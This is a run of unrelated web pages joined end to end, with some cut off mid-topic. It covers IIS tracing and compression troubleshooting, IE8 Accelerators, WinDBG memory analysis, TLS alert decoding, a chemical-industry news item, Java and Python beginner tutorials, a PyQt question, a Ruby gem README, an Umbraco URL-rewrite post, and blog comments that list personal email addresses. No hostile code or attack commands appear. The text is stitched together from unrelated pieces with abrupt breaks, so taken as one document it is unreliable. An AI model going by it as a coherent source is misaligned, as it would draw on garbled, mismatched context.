Now delete the values from the first column. Then we will add flags to each provider. Flags indicate the areas to trace and the verbosity levels. Each flag is separated by a TAB: after each entry, press Tab and type 0xFFFFFFFF, then press Tab and type 0x5. For IIS: WWW Server only, this will be 0xFFFFFFFE 0x5. The flags 0xFFFFFFFF & 0xFFFFFFFE indicate all areas, and 0x5 indicates full verbose mode.

Now we can reproduce the problem. Execute the HTTP request from any HTTP-capable client, or make the request via a browser. Once the problem has been reproduced, we can stop the trace as follows. At the command prompt, type:

Logman -stop MyTrace -ets <enter>

We should now have a file called MyTrace.ETL in the C:\ETW folder. This file is not readable using any editor; it first needs to be parsed.

Stage 2: Parsing an ETW trace.
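A small script can generate the tab-separated provider file that the steps above describe. The provider names, flag values, and file name here are examples; list the providers actually available on your machine with `logman query providers`:

```python
# Generate the tab-separated provider file described in the steps above:
# provider name <TAB> flags <TAB> verbosity level, one provider per line.
# The provider names and flags below are examples.
providers = {
    "IIS: WWW Server":    ("0xFFFFFFFE", "0x5"),
    "IIS: SSL Filter":    ("0xFFFFFFFF", "0x5"),
    "HTTP Service Trace": ("0xFFFFFFFF", "0x5"),
}

with open("iis_providers.guid", "w") as f:
    for name, (flags, level) in providers.items():
        f.write(f"{name}\t{flags}\t{level}\n")
```

The trace could then be started with something along the lines of `logman start MyTrace -pf iis_providers.guid -o C:\ETW\MyTrace.etl -ets`; check `logman /?` on your OS version for the exact switches.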
OK, so we now have a trace file that cannot be read by any editor because it is a binary file. To parse an ETW trace file, we need another tool: LogParser. I am sure many have heard great stories about this one. It is another powerful tool, provided by Microsoft as a free download. Download LogParser v2.2, then install it to the C:\LogParser folder.

Important: You need to parse an ETW trace on the same version of the OS where it was captured. This is because the ETW providers will be different for different versions of Windows.

Before you can use LogParser, there are a couple of things you need to do: register LogParser.dll in the system registry, and make a slight modification to the parsing Windows script so that it doesn't prompt you. We are now ready to parse the ETW trace file. At the second command prompt, type the following command and press ENTER:

Cscript DumpTraceReqs.js C:\ETW\MyTrace.etl > Output.txt <enter>

Wait for the command to finish and then open the file Output.txt in Notepad. You should now have a file that contains a very organized collection of information showing the activities in each stage of the request processing pipeline. Any kind of permissions problem, compression failure, etc. should show up here. It is self-explanatory. However, if you do have questions on what you see in the ETW trace file, please share or post them here and I'll help.

LogParser is a very powerful tool: you can use SQL-like commands for a variety of purposes, including reading event logs, IIS logs, pure text files, network trace files and many others. It also includes many functions which you can use to transform data. Take a look at this post, which contains a lot of examples. I hope you found this post useful in debugging problems. Please feel free to leave your feedback.
Recently, we ran into a problem where static or dynamic compression would not work on a few websites, especially SharePoint sites, but worked on other sites. I always use our software tools and take a data-driven approach to troubleshooting any kind of software problem. Software tools not only help you pinpoint the problem area, but also assist in effective troubleshooting. Without a data-driven approach, we are pretty much down to a guessing game or trial and error.

OK. So the next step is to identify what tool(s) to use, and the answer is: it depends. It depends on where you are troubleshooting (client side, server side, etc.). We know that the IIS server is responsible for sending compressed responses, so naturally we want to know why IIS isn't compressing responses. There are many cases where IIS will not compress a response, for example requests with status code 401. For a list of reasons, please refer to this blog post from Mike Laing, Escalation Engineer, Microsoft IIS support.

The most effective tools to trace into IIS are:

ETW is the easiest and preferred method because, unlike a DebugView trace, it doesn't require any registry changes or a restart of the IIS services. In an earlier post, I discussed how to capture and parse an ETW trace.

Back to the problem… So in this case, here's what the ETW trace showed us:

IISCompression: STATIC_COMPRESSION_NOT_SUCCESS - IIS has been unsuccessful doing static compression
Reason: COMPRESSION_DISABLED

CAUSE: The problem occurs only when you use a custom account for the application pool identity, which was the case here as well. When using a custom account for an application pool, you must give that application pool identity read permissions on the metabase compression keys within the IIS configuration file, metabase.xml, located in %windir%\system32\inetsrv, so that it can read the settings. A failure to read the settings causes a status of COMPRESSION_DISABLED.
Honestly, I didn't know the cause off the top of my head, but a genius (Vivek Kumbhar) on my team who fiddles around a lot with his machine knew the cause & resolution. I am trying to find out how we can track down this failure due to the lack of permissions on certain metabase keys, and I will update this post after that. I will also document the various reasons and their associated causes.

SOLUTION

So when using a custom identity for the application pool, take these additional steps.

Internet Explorer 8 is expected to be available in the near future, and it packs a whole lot of features. I downloaded the latest RC1 build from the Microsoft site and did some testing. This version packs in a lot of browser extensibility features besides many other CSS improvements. One of the extensibility features is Accelerators. Accelerators allow users to quickly send information to a web service and get back some information. For example, you may be browsing a web page and come across a word for which you want to look up the meaning; this is one of the scenarios where you can use Accelerators. Websites can offer to install Accelerators as part of their service. An end user can then install Accelerators of his choice, highlight a word on a web page, and select an Accelerator to use from a list of installed Accelerators. Internally, Internet Explorer 8 sends the highlighted text as a parameter to the selected web service and opens a new Internet Explorer window OR a preview window where you can see the results.

So, how do you create a new Accelerator for your website? It's really simple! Here's how to create one.

Step 1: Offer to install the Accelerator from your web page. For example, in your web page, add the following:

<h1>Dictionary Lookup Accelerator</h1>
<button onclick="window.external.AddService('')"></button>

So what is the window.external.AddService() method? That's one of the new extensibility APIs in IE 8.
More information is here.

Step 2: Create your Accelerator definition XML file.

<?xml version="1.0" encoding="UTF-8" ?>
<openServiceDescription xmlns="">
  <homepageUrl></homepageUrl>
  <display>
    <name>Lookup in Dictionary</name>
  </display>
  <activity category="Define">
    <activityAction context="selection">
      <preview method="post" action="">
        <parameter name="txtSearchFor" value="{selection}" type="text" />
      </preview>
      <execute method="post" action="">
        <parameter name="txtSearchFor" value="{selection}" type="text" />
      </execute>
    </activityAction>
  </activity>
</openServiceDescription>

The XML file we just created is called the service description file, and it contains a specific description of the service provider and the type of service it provides. The first two lines define the Open Service Format using the XML version and the namespace. The namespace merely defines all the elements in this specification. These lines must be in there.

The <homepageUrl> element: contains the URL of the website providing the service.

The <name> element: the child of the display element & contains the name of the service. There can only be one instance of this element in the XML file, and the number of characters cannot exceed 50. You can add two more child elements under the display element.

The next section describes the Accelerator and its capabilities.

The <activity> element: describes the activities of this Accelerator. The category attribute defines the category of the Accelerator, such as Search, Map, or Define. You can define your own category, but there must be only one instance of this element.

The <activityAction> element: child of the <activity> element. This section defines information that is specific to a context of the activity, using a context attribute. The context attribute indicates what the Accelerator should act upon. It can be one of the following values: selection, document, or link.

The <preview> element: child of the <activityAction> element. You can preview the information without opening the site.
Internet Explorer 8 will open a box where you can preview the information without actually opening the web page. The preview element defines the action for the preview. In the above example, we asked it to post the information to a specific web service URL, dictionary.asp, using the action attribute. This is similar to the action attribute in a web page form. The method attribute is self-explanatory.

The <parameter> element: child of the <preview> or <execute> element. The <parameter> element defines the names and values you want to pass to the URL when executing a preview or execute. This is the data posted to the service. If you are not sure what the parameter names are for a service, such as Live Search or the Encarta dictionary, you can use Fiddler to figure it out. The {selection} token acts like a variable: it is replaced by the user-selected text when invoking the web service. The type attribute defines the parameter data type.

The <execute> element: defines the action to take upon executing the Accelerator. Typically this opens a new instance of the browser and displays the results using the posted data.

If you want to get started quickly, simply copy the XML from above, modify the parameters, and use it. If you don't yet have a site or IIS, simply download and install Visual Web Developer from here.

Isn't it a simple and really cool feature? That's it for now. Hope you will have fun creating your own Accelerators and improving your browsing experience.

Unlike native debugging, you don't need symbols for debugging managed code. SOS.dll can be used with WinDBG and also with the Visual Studio debugger: simply use the Immediate Window in Visual Studio to load SOS.dll, and then you can use the commands provided by the extension. My favorite blog for managed debugging (and almost everyone else's) is by Tess Ferrandez-Norlander. Tess is an Escalation Engineer with Microsoft, and I don't think anyone else has explained managed debugging better than she has.
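To make the {selection} substitution concrete, here is a small Python sketch of what the browser effectively does when the execute action fires: fill in the template parameters from the XML above and form-encode them for the POST body. The helper function is purely illustrative, not an IE API:

```python
from urllib.parse import urlencode

# <parameter> name/value pairs from the Accelerator XML above.
parameters = {"txtSearchFor": "{selection}"}

def build_post_body(params, selection):
    """Replace the {selection} token with the highlighted text and
    form-encode the result, as the browser does for a POST action."""
    filled = {k: v.replace("{selection}", selection) for k, v in params.items()}
    return urlencode(filled)

print(build_post_body(parameters, "serendipity"))  # txtSearchFor=serendipity
```

This is also a handy way to test your service endpoint by hand before wiring up the Accelerator: POST the same body to it with any HTTP client and check what comes back.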
Her blog is a good place to start with the basics & I highly recommend reading it. It not only teaches the techniques of debugging, but also contains code examples that illustrate various problems. The comments section of each post also has very valuable information. So here, I explain how I go about looking at high memory dumps.

Big question: I always have one question in mind - where is most of the memory? Then I start looking for it. Once I identify which components are the major contributors to memory usage, I check to see if the problem can be resolved with a hotfix. While this usually requires identifying patterns and some experience, for beginners it is still worth checking the Microsoft support site to see if the problem you are running into is described in a KB article and if a hotfix is available. The easiest way is to stay updated, because Microsoft continuously investigates such issues and provides hotfixes. If the problem is traced down to application code, the developers should work to reduce memory usage.

First step: open the dump in WinDBG. For instructions on setting up WinDBG, please see this post. First, we need to find out where "most" of the memory is. A debugger command is available that will help us here: !address -summary. To effectively understand and interpret the output, we first need to understand what the output values represent; take a look at this MSDN article. In the output of the !address -summary command, the column named "KB" indicates, in kilobytes, the amount of memory in each of these "areas", and the Pct(Tots) column indicates that value as a percentage of the total address space (4 GB on 32-bit). Thus, if RegionUsageIsVAD is high, it indicates that most memory is in virtual allocations. .NET heaps are created with calls to VirtualAlloc: the GC in .NET uses the Microsoft Win32® VirtualAlloc() application programming interface (API) to reserve a block of memory for its heap.
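To make the Pct(Tots) column concrete, here is a small sketch of the arithmetic, taking the total to be the full 4 GB 32-bit address space:

```python
# Pct(Tots) = a region's KB value as a share of the total address space.
TOTAL_KB = 4 * 1024 * 1024  # 4 GB expressed in KB (32-bit process)

def pct_of_total(region_kb, total_kb=TOTAL_KB):
    return 100.0 * region_kb / total_kb

# A 1 GB RegionUsageFree on 32-bit works out to 25% free address space,
# approaching the ~30% threshold at which fragmentation is worth a look.
print(f"{pct_of_total(1024 * 1024):.2f}%")  # 25.00%
```

The same arithmetic applies to RegionUsageIsVAD, RegionUsageImage, and the other region counters discussed below.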
Depending on the flavor of GC in use, the segments may be 32 MB (workstation GC) or 64 MB (server GC) allocations. For ASP.NET applications running in IIS, the server GC is automatically selected by default if the computer has two or more processors.

Similarly, RegionUsageFree indicates most of the memory is "Free". If applications start throwing OutOfMemory exceptions and a captured dump shows most of the memory is Free, that indicates fragmentation within the process address space. Typically, if 30% or more of memory is Free, I'd suggest investigating why memory is fragmented.

If RegionUsageImage is high, it means you have lots of DLLs loaded in the process. Ideally, 100 MB or less is good. ASP.NET applications should not have the debug attribute set to true in web.config: enabling debugging emits debug information, which adds overhead and can cause memory problems. Similarly, there should not be any modules built in debug mode.

If RegionUsageHeap is high, it means most of the memory is on heaps, e.g. the C runtime heap, the MDAC (Microsoft Data Access Components) heap, heaps used for compression, etc. When you use the MSVCRT.dll library, it internally ends up allocating on the C runtime heap via calls to allocation APIs such as malloc/calloc.

Note that there are many tools out there (not just WinDBG) that allow you to identify the allocation profiles of applications. E.g., for .NET applications you can use CLRProfiler (Microsoft) and ANTS Profiler (Red Gate). I do not know about profilers for native C/C++ applications; however, Debug Diagnostics Tool v1.1 from Microsoft includes the capability of injecting a DLL, LeakTrack, into the process, which hooks allocation calls and keeps track of who made the allocations. DebugDiag also includes a memory pressure analysis script that can read a dump with LeakTrack injected and give you a very nice report on where the allocations are: by size, by count, and many other parameters.
It's helpful 99% of the time when debugging web applications hosted on IIS. I will discuss this in another blog post. WinDBG is usually used for post-mortem debugging. Profilers should be used only in development and test environments, not production: they are very invasive and can reduce performance by about 10 times.

Continuing a bit more about RegionUsageIsVAD… If you determine that most memory is from virtual allocations AND you have ASP.NET web applications running in IIS, then it is almost always likely that large amounts of memory are allocated on managed heaps. You will then need to investigate the .NET heaps to determine the top memory consumers. That's where the !dumpheap -stat command comes into the picture. More in my next post.

In one of my earlier posts, I explained how to use Microsoft Network Monitor to debug a networking problem. Network trace tools aren't very useful in debugging problems when the channel is secured (HTTPS) and you need to view the data to draw your conclusions. However, you can still debug SSL handshake failures using Network Monitor. Here's a scenario: a client (not a browser) is trying to connect to an IIS web server, sending its client certificate in order to post some data. However, the IIS machine always rejects the authentication. The first step was to take a network trace as usual. For instructions on how to capture simultaneous traces, see this post.

Analyzing the network trace: I filtered the traffic by the keyword SSL. In the display filter tab, type SSL and click the Apply button. Here are some of the frames we picked from the capture. During SSL connection negotiation, the client and server can mutually exchange certificates for authentication; the client authentication can be optional.
To understand more about how the SSL negotiation takes place, please see these Microsoft KBs Description of the Secure Sockets Layer (SSL) Handshake Description of the Server Authentication Process During the SSL Handshake Essentially, what is going on here can be summarized as: While performing any type of debugging, we need to follow the data; we need to look for something that is “interesting”. In this case an “alert” from the server is being sent. So we looked at what this alert is. Since our “interesting” frame is 32, we looked more at the headers and the details in the frame. Here is the frame in detail Frame: Number = 32, Captured Frame Length = 61, MediaType = ETHERNET + Ethernet: Etype = Internet IP (IPv4),DestinationAddress:[MAC Address],SourceAddress:[Source MAC Address] + Ipv4: Src = ServerIP, Dest = ClientIP, Next Protocol = TCP, Packet ID = 5022, Total IP Length = 47 + Tcp: Flags=...AP..., SrcPort=5443, DstPort=1100, PayloadLen=7, Seq=2764379044 - 2764379051, Ack=3896915131, Win=64240 (scale factor 0x0) = 64240 - Ssl: Encrypted Alert. - TlsRecordLayer: ContentType: Encrypted Alert - Version: TLS 1.0 Major: 3 (0x3) Minor: 1 (0x1) Length: 2 (0x2) EncryptedData: Binary Large Object (2 Bytes) Here is the handshake data in Hex (This data isn't encrypted yet because the handshake is still in progress) 00 1E 68 0F 3E 80 00 30 48 7E 1B 90 08 00 45 00 00 2F 13 9E 40 00 3D 06 D2 0E 0A F4 40 0F 0A 33 02 E7 15 43 04 4C A4 C5 13 A4 E8 46 34 BB 50 18 FA F0 2B B8 00 00 15 03 01 00 02 02 2A We can conclude a lot from this frame. We know that this is an ethernet packet. The TCP flags set are AP, which means transfer data to the end application on the client without buffering at the TCP level, the communication port on the server is 5443, the client port is 1100, the window size for data transmission is 64240 bytes and so forth. 
The most interesting set of data is the TLS record layer. It shows the major and minor versions in use after negotiation and the length of the data, which is 2 bytes. This data is encrypted. So here's the trick: this is an encrypted alert, and the RFC defines the alert descriptions. You can find it here for TLS 1.0 (Transport Layer Security). Take the hex value of the 2 bytes of this message, which is 2A (the last 2 values; all values before this are headers in hex, and we can ignore them because Network Monitor already gave us that information). Using Windows Calculator, convert hex 2A into decimal. We get 42. Now, let's go look at the TLS 1.0 RFC to find out what decimal value 42 represents for AlertDescription. You can search for "AlertDescription" on the page. Thus, we can see that 42 translates to bad_certificate. So we can say that the client sent a bad certificate to the server, and therefore the server rejected the connection request. Armed with this information, we checked the client certificate in the certificate store and indeed, we had a bad certificate. Replacing it with a good certificate fixed the problem!

Software has come a long way and enabled people around the world to do many things. It has also made our lives so much easier. However, these new capabilities have also created new problems, and the answers to those problems are software tools: excellent utilities for debugging. I want to once again thank all those developers who made these tools, continue to improve them, and build new ones. It makes the job of a support professional much easier and helps a lot of customers resolve complex problems. Thank you!
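The Calculator-plus-RFC lookup above can also be scripted; a small sketch (the alert numbers are taken from the TLS 1.0 RFC, and only a certificate-related subset is shown here):

```python
# Map a TLS alert code from a captured handshake to its RFC 2246 name.
TLS_ALERTS = {
    40: "handshake_failure",
    42: "bad_certificate",
    43: "unsupported_certificate",
    44: "certificate_revoked",
    45: "certificate_expired",
    46: "certificate_unknown",
    48: "unknown_ca",
}

def decode_alert(hex_byte):
    """Take the last payload byte as hex (e.g. '2A') and decode it."""
    code = int(hex_byte, 16)  # "2A" -> 42
    return code, TLS_ALERTS.get(code, "unknown")

print(decode_alert("2A"))  # (42, 'bad_certificate')
```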
03 November 2009 17:07 [Source: ICIS news] LONDON (ICIS news)--The German chemical industry's recovery is continuing to improve amid increasing demand for more base and specialty products from Asia. Chemical production rose 4% in the third quarter compared with the previous one, with revenue also rising 5.5%. Production had previously risen 2.5% in the second quarter from the first. "It is encouraging that more and more industrialised nations are freeing themselves from the grip of the economic crisis," said Ulrich Lehner, VCI chairman. However, VCI said full-year chemical production would drop about 10% from 2008, the biggest year-on-year decline since 1975, and it added that full-year industry sales would fall 12% from 2008. Employment in the German chemical industry, the country's fourth-largest sector, fell 2% year on year to about 432,900 in the third quarter of 2009. Meanwhile, in its autumn projection, the European Commission said German GDP was expected to contract 5.0% in 2009, grow 1.2% in 2010, and show further growth of 1.7% in 2011.
Create Java Hello World Program

This tutorial explains how to create a simple core Java "Hello World" application. The Hello World application will print the text "Hello World" at the console. This example explains all the steps in creating a Hello World application. In this section we will discuss a simple Java program. A HelloWorld application shows you how to start writing your first Java class.

Example

First we will create a Hello World Java program, then I will explain the terms used in the program. This is a basic example of core Java that explains how to write a Java class.

Source Code

public class HelloWorld {
    public static void main(String args[]) {
        System.out.println("Hello World");
    }
}

Now let's see a brief description of the terms used in the above program. The important thing to know about Java programs is that Java is a case-sensitive programming language, i.e. the text "Rose" and "rose" written in a Java program is treated differently. So, always be careful about case sensitivity when writing a Java program. Generally, Java keywords are written in lowercase. The first line of the above program is written as "public class HelloWorld": it declares a public class named HelloWorld. In the second line a '{' (opening curly brace) is used to open the class body. The third line of the above program is written as "public static void main(String[] args)". This is called the main method in Java. It is a predefined method, and every application must contain a method with this signature.

The method public static void main(String args[]) can be explained as follows: it can be accessed publicly, it is a static method, it does not return any value, and its argument shows that this method takes an array of String elements as input. The main() method with the signature defined above is the entry point of the application, and it can invoke other methods. In the fourth line a '{' (opening curly brace) is used to open the body of the main() method. The fifth line of the above program is written as "System.out.println("Hello World");". This statement is used for writing the output to the console. In the sixth line a '}' (closing curly brace) is used to close the body of the main() method. In the seventh line a '}' (closing curly brace) is used to close the class body.

How to save a Java program

First open Notepad or any other Java editor to write the above Java code, then save the file (File->Save/Save As) in the directory of your choice, naming the file after the class name given in the program, with a .java extension.

How to execute a Java program

Before executing a Java program it needs to be compiled, so first compile your Java program. Open a command prompt, go to the directory where you stored your Java file, then run: javac class_name.java (e.g. javac HelloWorld.java). If no errors are found, this will create a class file; now you can execute your Java program as follows: java class_name (e.g. java HelloWorld).

Output

If you compiled and executed the above Java program successfully, the output will be as follows: Hello World
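The case-sensitivity point made above can be seen in a small sketch (CaseDemo is a made-up class name, not part of the tutorial):

```java
// Java treats "Rose" and "rose" as two different identifiers,
// so these are two separate variables with separate contents.
public class CaseDemo {
    public static void main(String[] args) {
        String Rose = "a flower";
        String rose = "a name";
        System.out.println(Rose.equals(rose)); // prints: false
    }
}
```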
Embed PyQt in C++/C

Hi, I have written an application in PyQt5. I now need to embed that in a C/C++ application. I see how to embed Python in C/C++, but I do not know how I can make sure the PyQt5 widgets are also available when run inside C/C++. Some of the PyQt5 widgets I have used:

from PyQt5.QtWidgets import QApplication, QFrame, QGridLayout, QHBoxLayout, QPushButton, QSizePolicy, QSpacerItem, QToolButton, QVBoxLayout, QWidget, QTextEdit

How do I make sure these PyQt5 objects are there inside C/C++ when I embed? Any help much appreciated. Thanks!

Have a look at PythonQt.
File Validators

The File Validators gem adds file size and content type validations to ActiveModel. Any module that uses ActiveModel, for example ActiveRecord, can use these file validators.

Support

- ActiveModel versions: 3.2, 4, 5 and 6.
- Rails versions: 3.2, 4, 5 and 6.

Installation

Add the following to your Gemfile:

gem 'file_validators'

Examples

See the :validates_file_size and :validates_file_content_type idioms below.

API

File Size Validator:

validates :avatar, file_size: { less_than: 1.megabyte, greater_than_or_equal_to: 20.kilobytes }

The following two examples are equivalent:

validates :avatar, file_size: { greater_than_or_equal_to: 500.kilobytes, less_than_or_equal_to: 3.megabytes }
validates :avatar, file_size: { in: 500.kilobytes..3.megabytes }

Options can also take a Proc/lambda:

validates :avatar, file_size: { less_than: lambda { |record| record.size_in_bytes } }

File Content Type Validator supports :allow and :exclude:

# this will allow all the image types except png and gif
validates :avatar, file_content_type: { allow: /^image\/.*/, exclude: ['image/png', 'image/gif'] }

Security

Without spoof detection, a mislabeled file may pass validation and be saved as an .html document, exposing your application to a security vulnerability. The media type spoof detector won't let that happen: it will not allow a file having image/jpeg content type to be saved as text/plain. It checks only media type mismatch, for example text of text/plain versus image of image/jpeg. So it will not prevent image/jpeg from being saved as image/png, as both have the same image media type.

note: This security feature is disabled by default. To enable it, add the mode: :strict option in content type validations. :strict mode may not work in direct file uploading systems, as the file is not passed along with the form.

i18n Translations

en translations for these errors live under the errors.messages namespace. If you want to override and/or create other locales, you can check this out to see how translations are done.

You can override all of them with the :message option. For the unit format, it will use number.human.storage_units.format from your locale; for unit translation, number.human.storage_units.

Further Instructions

If you are using :strict or :relaxed mode, for content types that are not supported by the mime-types gem, you need to register those content types. For example, you can register .docx in an initializer:

# config/initializers/mime_types.rb
Mime::Type.register "application/vnd.openxmlformats-officedocument.wordprocessingml.document", :docx

If you want to see what content type :strict mode returns, run this command in the shell:

$ file -b --mime-type your-file.xxx

Issues

Carrierwave - if you are adding file validators to a model, you are recommended to keep extension_white_list and/or extension_black_list in the uploaders (in case you don't have them, add those methods). As of this writing (see issue), Carrierwave uploaders start processing a file immediately after its assignment (even before the validators are called).

Tests

$ rake
$ rake test:unit
$ rake test:integration
$ rubocop

# test different active model versions
$ bundle exec appraisal install
$ bundle exec appraisal rake

Problems

Please use GitHub's issue tracker.

Contributing

- Fork it
- Create your feature branch (git checkout -b my-new-feature)
- Commit your changes (git commit -am 'Added some feature')
- Push to the branch (git push origin my-new-feature)
- Create a new Pull Request

Inspirations

License

This project rocks and uses MIT-LICENSE.
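Conceptually, the size validator is just a bounds check on a file's byte count; a plain-Ruby sketch mirroring the in: 500.kilobytes..3.megabytes example (the names here are illustrative, not the gem's API):

```ruby
# Bounds for the illustrative check, expressed in raw bytes.
MIN_BYTES = 500 * 1024       # 500 kilobytes
MAX_BYTES = 3 * 1024 * 1024  # 3 megabytes

def size_valid?(bytes)
  (MIN_BYTES..MAX_BYTES).cover?(bytes)
end

puts size_valid?(1024 * 1024)  # 1 MB  -> true
puts size_valid?(10 * 1024)    # 10 KB -> false
```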
Newton Excel Bach is aimed at people who work with numbers without a $ on the front. Posts will alternate between Excel and engineering/science topics, with the occasional post related to neither when I feel like it. Contact e-mail: dougjenkins@interactiveds.com.au About Interactive Design Services Interactive Design Services is a Sydney based structural design consultancy specialising in the analysis, design and review of bridges, buried structures, retaining walls and related civil engineering structures. More details may be found at: Interactive Design Services A good day ; I want to say that what is here is the produce of a shinely mind . I have a very big need of your help ! … I try to get the solution for an UDF which work in array ; how can I contact you , if you allow me ? Please very much for help , I have a very big need to have this UDF , and it seems nobody can give me the right solution anymore ; I put here a link where is described all my problem : The thread have name UDF …VBA Formula built …please help , username ytayta555 ; Thank you very much , and I wait impatient your big help for me . Respectfully Dombi – thanks for your comments. I have left a reply in the thead you linked to. I didn’t expect to get response from a great personality like you , mr. Doug Jankins , I’m really surprised . Great atitude … Now , my problem is solved 98% ; I hope and please you to help me and to resolve the last part of 2% . Really , I just wonder what can I do to can do for you what you just done fore me . What a benefit for humanity to have so shinely and creative minds … Hi. Hi João – I’m not exactly sure how your line of passes system would work at the moment, but if you would like to send some sketches and/or worksheets to my Gmail account (Dougaj4 at the usual gmail) I will have a look at them when I have time (pretty busy at the moment, so it may not be straight away). I’d be interested to see your line length code as well if you would like to send it. 
Thanks for the kind comments. Doug Dear Mr Jenkins, We identified your site as one of the leading information sources on the Internet about Microsoft Excel software. We would like to take this opportunity to introduce you our site, SpreadsheetZONE. SpreadsheetZONE, a content partner of Microsoft Office Online, is a growing repository of free online Microsoft Excel templates available for everyone for personal or business usage. Most of the templates are developed by SpreadsheetZONE Team, in various categories including finance, sales, education, and project management. Our library grows everyday as new templates are published, and number of our users keeps increasing. Please visit our site at and let us know what you think. We always welcome suggestions from Excel community to improve our site and services. Thank you, SpreadsheetZONE Team HiF. +1 Hi Beatrix – thanks for the comments. Could you provide a bit more detail about what you are wanting to do with the intersection calculation, and what data you are working with? There is a spreadsheet on the blog that calculates intersections of lines and/or circles (IP.xls) which may help, but assuming you are wanting to calculate if a moving ball will intersect the path of a moving player it may not be so straightforward. I’d be interested to see your code. If you would like to e-mail to dougaj4@gmail.com I will have a look. Doug I’m a civil engineer in the states and a programming enthusiast. Have you ever thought about setting up a repository for user-submitted code, feedback, or requests? I’m sure a collection of your readers would be interested in the challenge, including myself. Good idea! I’ll set up a separate page for readers programs and ask for submissions when it is ready. Happy New Year! Regards Alfred You should consider adding Ron DeBruin’s web page to you list. Happy New Year! Regards Alfred Hi Doug, Excellent job on the blog. I find it really helpful and educative, I can learn a lot here. 
FYI, I also work at engineering consultant specializing in civil engineering works such as structural assessment and design of buildings, bridges, etc. It is based in Jakarta, Indonesia. When i have free time, i sometime try to make a useful spreadsheet such as beam/column/others design (according to Indonesian building code), ETABS/SAP output processor, etc. Currently I am working on Bill of Quantity spreadsheet to calculate material quantity (concrete and steel) with a good precision (detail calculation) to be used in Value Engineering works. Unfortunately i have limited knowledge on VBA programming so i keep stumbling on a problem from time to time. Hopefully i can “steal” your time once in a while to discuss about it. I like this blog and i’ll be glad to take an active role here. I’d gladly share my knowledge and my spreadsheets if it can be of any help here. Regards Bob …this blog helped me develop my skills in VBA in relation to structural engineering, big thanks to mr. Jenkins.. I am also a programming enthusiast here in the Philippines and I was hoping to find a company who gives interest with this kind of trade.. Thank you for taking the time and energy to release this very high quality information. I really enjoy reading your posts and following along. Your code is as previously mentioned is of very high quality. Your comment sections are simply lovely. Very bright and intelligent spot on comments. As someone stated previously Shiny! Doug – Great blog with tons of interesting info. Thanks for posting regularly. Excel is a great tool for most “day-to-day” math and your blog provides several useful aspects. All the best! Doug, you have a lot of great information here. I was wondering under what terms you release your excel sheets and scripts? I am working on a column designer web app / side project of mine, and I would like to use some of your PM interaction code as reference when I write the backend algorithms. 
It will be server side (not publicly visible) and in a different language (go vs VBA). Would this be an acceptable use to you? Best Regards. Jeremy – Most of the spreadsheets have an “about” page with a licence and disclaimer statement. In summary this says you can use the code as you wish, but it comes with absolutely no warranty. Hi Doug, thanks for your amazing blog and the wealth of knowledge you share in your blog. I am a civil engineer from Singapore, and I’ll be starting work in the Melbourne Metro Tunnel Project (MTP) this August 2018. I do write some VBA codes and functions to help me with my work too. One Excel VBA function which I completed some time ago, which I found to be quite a challenge to create, was a “ReturnFindAddress” function, which would return (either as a string or an array) the cell addresses of the search results of a specified search string which I supply to the function. Anyway I just wanted to say Hi, and let you know that I appreciate your blog as it lets me know what is possible in Excel, especially in engineering applications. Cheers and have a good day! Thanks Jay, I hope all goes well in Melbourne! Hello Doug, Hope you are well. Noticed your replies about VBA and Python on Quora. Do you provide consulting? We have an Excel file that is taking a several seconds to compute, which creates a poor user experience. We have developed a lean Python script using Numpy, but we are having issues running the script in Excel (the Python pluggin is difficult to install). Could we have a call? Hope you can help. Best, Daniel P.S. – Here is our company website:
Python provides the return statement in order to return some value, data, or object at the end of function execution. The return statement is used to provide the execution result to the caller. The return statement cannot be used outside of a function, which makes it function specific. In this tutorial, we examine how the return statement can be used in different cases.

return Statement Syntax

The return statement can only be used inside a function; it cannot appear outside of a function, for example at the top level of a Python script.

def function():
    ... BODY ...
    return EXPRESSION

- BODY is the function body, where the statements that will be executed inside the function are provided.
- EXPRESSION is the expression whose result will be returned to the function caller. EXPRESSION can be a value, object, variable, list, etc.; it can even be a function.

Return Value

The return statement is generally used to return a value. One of the most popular reasons to call a function is to perform some calculation or action that results in a value. The return statement can return values or variable values easily, like below. In the following example, we return the sum of the two parameters provided to the function.

def add(a, b):
    result = a + b
    return result

returned_result = add(1, 2)

Return Object

The return statement can also return an object to the function caller. In Python everything is an object, so returning a list, a dictionary, or a class instance works the same way as returning a number.

Return List

The return statement can be used to return multiple items. One way is using a list, where multiple items can be put inside a list and this list is returned to the function caller.

def say():
    names = ["ahmet", "ali", "baydan"]
    return names

returned_list = say()

Return Multiple Values and Objects with Tuple

A tuple is a comma-separated sequence of items, and a tuple cannot be changed after creation; simply put, a tuple is immutable.

A tuple can be used with the return statement in order to return multiple items.

def say():
    print("Returning a tuple")
    return "ahmet", "ali", 1

returned_tuple = say()

Return Function

The return statement can also return a function. A function can be defined inside another function, and the inner function's name can be given to the return statement. The returned function can then be used as a regular function.

def math():
    def add(a, b):
        return a + b
    return add

mysum = math()
result = mysum(1, 2)
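Returned tuples are usually unpacked directly into separate variables by the caller; a small sketch (min_max is an illustrative name, not from the tutorial):

```python
# A function returning two values as a tuple, unpacked by the caller.
def min_max(values):
    return min(values), max(values)

lo, hi = min_max([3, 1, 4, 1, 5])
print(lo, hi)  # prints: 1 5
```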
Moving from DateFolders to Umbraco's new ListView

This site is currently still running on Umbraco 6.1.6, but I'm moving it over to Umbraco 7, and I didn't want to have my blog posts listed in date folders any more. DateFolders were a bit of a hack to make sure that the tree in Umbraco could load quickly. Too many children under one single node would cause the expansion of the tree to slow down. Not only that, it's hard to find items if there's a long list under just one child. The ListView in Umbraco 7 solves all that: it's a nice sortable, searchable and paged list of child items under the current node. In this screenshot, for example, there's three children under the currently selected node and they're shown in a list on the right side instead of in the tree on the left:

So there were two challenges: moving all items and making sure the old URLs wouldn't start failing. Redirecting the old URLs was actually the difficult part (since I suck at regex..). I used IIS' URL Rewrite 2.0 extension for this. This extension is not installed by default on all webservers, but in Umbraco as a Service (which is where this site lives) it is installed, nice! So now to figure out the pattern:

- each blog post url starts with blog/
- then a 4 digit year
- then a 1 or 2 digit month
- then a 1 or 2 digit day
- then the blog title

This leads to one group that includes the date and one group that contains the rest of the URL (groups are made by surrounding some arguments in parentheses):

(blog/\d{4}/\d{1,2}/\d{1,2}\/)(.*)

So once I got that one working, I added it to the web.config, in the rewrite/rules section.
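Outside of IIS, the pattern can be sanity-checked quickly; a sketch using Python's re module purely as a convenient regex engine (the sample URL is made up):

```python
import re

# The two capture groups from the rewrite rule: date prefix, then the rest.
pattern = re.compile(r"^(blog/\d{4}/\d{1,2}/\d{1,2}/)(.*)$")

m = pattern.match("blog/2014/1/15/moving-to-listview")
print(m.group(1))  # prints: blog/2014/1/15/
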